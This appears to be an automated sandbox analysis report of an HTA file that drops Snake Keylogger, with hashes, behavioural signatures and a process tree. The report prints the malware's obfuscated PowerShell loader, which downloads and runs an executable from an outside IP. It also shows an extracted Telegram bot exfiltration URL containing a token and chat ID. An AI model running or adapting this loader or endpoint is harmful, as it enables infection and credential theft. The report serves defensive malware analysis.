Analysis
-
max time kernel
143s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 06:17
Static task
static1
Behavioral task
behavioral1
Sample
seethebesthtmlthingsreadyforgetme.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seethebesthtmlthingsreadyforgetme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebesthtmlthingsreadyforgetme.hta
-
Size
129KB
-
MD5
03140c0995d8db21fe4fb2f030322615
-
SHA1
0199286b876a0d3e896b1830ff024555374e51f3
-
SHA256
95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305
-
SHA512
9f2682368cd24bf210edf0ec6d286d016a89b5fba4649fdd76d18bdc7f1cbc4dfb079079d074756dbfcf6377c1e34d6b59664df6ca7a8e6770af2fce704e09f9
-
SSDEEP
96:Eam780jLy6w80jLyrdUwSdffYJMK0jLyqx0jLyt0Aj5OtG80jLy987T:Ea280f7w80fCUpdWMK0fd0fX5A80fGCT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/3456-91-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 216 PowERShELL.Exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 216 PowERShELL.Exe 4936 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 2704 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023b7c-75.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2704 set thread context of 3456 2704 taskhostw.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5060 2704 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowERShELL.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 216 PowERShELL.Exe 216 PowERShELL.Exe 4936 powershell.exe 4936 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2704 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 216 PowERShELL.Exe Token: SeDebugPrivilege 4936 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 848 wrote to memory of 216 848 mshta.exe 84 PID 848 wrote to memory of 216 848 mshta.exe 84 PID 848 wrote to memory of 216 848 mshta.exe 84 PID 216 wrote to memory of 4936 216 PowERShELL.Exe 89 PID 216 wrote to memory of 4936 216 PowERShELL.Exe 89 PID 216 wrote to memory of 4936 216 PowERShELL.Exe 89 PID 216 wrote to memory of 3900 216 PowERShELL.Exe 94 PID 216 wrote to memory of 3900 216 PowERShELL.Exe 94 PID 216 wrote to memory of 3900 216 PowERShELL.Exe 94 PID 3900 wrote to memory of 5100 3900 csc.exe 95 PID 3900 wrote to memory of 5100 3900 csc.exe 95 PID 3900 wrote to memory of 5100 3900 csc.exe 95 PID 216 wrote to memory of 2704 216 PowERShELL.Exe 98 PID 216 wrote to memory of 2704 216 PowERShELL.Exe 98 PID 216 wrote to memory of 2704 216 PowERShELL.Exe 98 PID 2704 wrote to memory of 3456 2704 taskhostw.exe 101 PID 2704 wrote to memory of 3456 2704 taskhostw.exe 101 PID 2704 wrote to memory of 3456 2704 taskhostw.exe 101 PID 2704 wrote to memory of 3456 2704 taskhostw.exe 101 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebesthtmlthingsreadyforgetme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\WInDoWspOwERsHell\v1.0\PowERShELL.Exe"C:\Windows\SYStEM32\WInDoWspOwERsHell\v1.0\PowERShELL.Exe" "POwersHelL -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE ; Iex($(iEx('[sYStEM.TEXt.enCodInG]'+[cHaR]58+[chAr]0X3a+'UTf8.gETSTRInG([SYSTEm.COnVert]'+[ChaR]58+[ChAR]0X3A+'FroMbASE64strINg('+[ChAR]0X22+'JG44ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlckRFZklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1tVkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd1pEdUhyU0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6cUxySWYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUN1bGdiLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmlmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkp4dkVqQU9mV0RaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2V1USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG44OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMjgwL3Rhc2tob3N0dy5leGUiLCIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSdC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[chAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u0zzrezf\u0zzrezf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9376.tmp" "c:\Users\Admin\AppData\Local\Temp\u0zzrezf\CSC514FDAC3BFAF4BE3806EDDE59783357.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:5100
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- outlook_office_path
- outlook_win_path
PID:3456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 7484⤵
- Program crash
PID:5060
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2704 -ip 27041⤵PID:2676
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5914d03e37c56a5f92375227785da6e03
SHA110702929f56d3e8ab03b3af14318ef92b8ecb0dc
SHA25643f56bd6838667cce0cb6e2f4ac5735783edc7d740603a760d524aa2a712082d
SHA51263738d56b9b4b0f1869032529e0fddcfa4d522b0dc769208970c5bb7f716bc1c55bd898fbb35dbaccefbf72618e977f166b86dce2e571d40ac6f1abc4e1333ed
-
Filesize
1KB
MD54afad291f70acb2ddd8493fb59952c8e
SHA110d75d50d8dbe6c66ffc24a7c5cb89d87219a18b
SHA256bda30f965ed261ec4a6b5fb779cc3e19a5aa115d9ab2c8159922ef066c6f9d3d
SHA5123f0ea61daeceec13515a259aab5b7659f4c4555411bd3dd4d478710872e77db8f6342d43f1b3d7092ba64f042b06e27042eada7ec2bb316dfa8c2190f20675b5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD56657c2c04e41449064ddc92563cb0cbf
SHA142cfb47e5bff31c0e67a426cecb7165c3dcfefa9
SHA2568202f6cfd90dae13585790020596c7895376f21ee33dcec88b41b74206b83d3a
SHA51259a0103be552be89a5f26d693f207a53c1c97282905c635319a74c48d213d94608428343ff416b91b8196e25ed1ec5040655ba13b515d59dc536c0bf8db49acb
-
Filesize
938KB
MD56b4aad7f0941b424ba0a1875283fd7b6
SHA10312e216f8ee678cfb55bc938c24c8e2c9ece5a9
SHA25674d35d82c03a46422ee0b10d62b8f587d0e4a86a8b89d58352a97208ddcf65cf
SHA5124901b2f74afa67c60829d02c71009244f8971d6b5cc04bc7c4a4c9ebbfc6534f8c2dea543f1b3383d1de41b5ec78835c1c54ad77a03e555a1c5d5b474a738966
-
Filesize
652B
MD590265c25c99c90c514a6045cc185de26
SHA12e65f6dd986710a388b977289539bcf56e4c1657
SHA256423af548a892ead54cf80ccbca3486bc5e6f3a7b22659a3afdba27f859cc1951
SHA512ab995638672007cc922dde18c113dab13a2f2c3c6a7e2b6833c259d5c11fd8c483b799a516e4907f7cdec4669b7287c0998c74972d6a9f4fd533806c0387191b
-
Filesize
474B
MD50e03065f874d09489b23d564815660e8
SHA1005cc140f8d9ad68a7863aee4da445e466c98379
SHA2569600c5f95e6b296008011163196ad864c684b50e172ea35f0ca140ce577c75f1
SHA512a55b8c7d5656c0c854da908ecf6bcc64f9520b61ff21154aa548e01dbd69ffd762806c09b3ec331d94b23b6145b48e2e649ead07dab8d73a17bc2a6981800d10
-
Filesize
369B
MD5e87b16bd09f01b17e308658eefee18ce
SHA131cce01cfc2a0578f4f9a0d0a1d55cfcab48343c
SHA256f57406ea5572ca5aa39983da98772cead8e1425fdd70855e95722ab3ce648f3d
SHA512dd321931a205e4d9a95f81edd497ca9cc340829daf487dea71b36d14324434c6a2f40ac721a25a3f0bb57cf5c215593820125af258dce75bef522b170b841c51